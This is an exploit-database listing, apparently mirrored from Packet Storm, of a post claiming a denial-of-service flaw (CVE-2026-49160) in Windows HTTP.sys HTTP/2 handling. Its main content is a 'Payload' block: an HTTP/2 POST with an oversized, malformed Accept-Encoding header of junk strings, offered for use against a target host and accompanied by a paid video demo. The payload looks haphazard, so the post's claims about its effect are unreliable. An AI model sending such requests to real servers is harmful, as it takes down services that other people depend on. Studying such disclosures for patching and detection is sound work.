Lucene search
K

📄 HTTP.sys HTTP/2 Denial of Service

🗓️ 24 Jun 2026 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 35 Views

DoS in Windows HTTP.sys HTTP/2 from unauthenticated attacker via malformed Accept-Encoding.

Related
Code
# Titles: CVE-2026-49160 - HTTP.sys HTTP/2 Denial of Service (DoS) Vulnerability
    # Author: nu11secur1ty
    # Date: 06/24/2026
    # Vendor: Microsoft Corporation
    # Software: Windows HTTP.sys (HTTP/2 Protocol Stack)
    # Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-49160
    
    ## Description:
    
    A critical Denial of Service (DoS) vulnerability exists in the Windows
    HTTP.sys kernel-mode driver, specifically in its handling of HTTP/2
    protocol requests. The vulnerability, tracked as CVE-2026-49160, allows an
    unauthenticated remote attacker to cause uncontrolled resource consumption
    (CWE-400) by sending a specially crafted HTTP/2 request with an oversized
    and malformed Accept-Encoding header. This triggers excessive memory
    allocation and CPU utilization within HTTP.sys, effectively crashing the
    service and rendering all dependent web services (such as IIS) unavailable.
    The attack can be executed within seconds and does not require any form of
    authentication or user interaction. All supported versions of Windows
    Server (2016, 2019, 2022, 2025) and Windows client OS (10, 11) are affected
    prior to the June 2026 security update.
    
    STATUS: MEDIUM - HIGH/ Vulnerability
    
    [+]Payload:
    ``` POST
    POST / HTTP/2
    Host: target.com
    Accept-Encoding:
    AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************stupiD,*,,
    ```
    
    [+]Demo:
    Video Demonstration
    [url](https://www.patreon.com/nu11secur1ty/posts/cve-2026-49160-161926764)
    
    Time spent:
    00:01:20

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation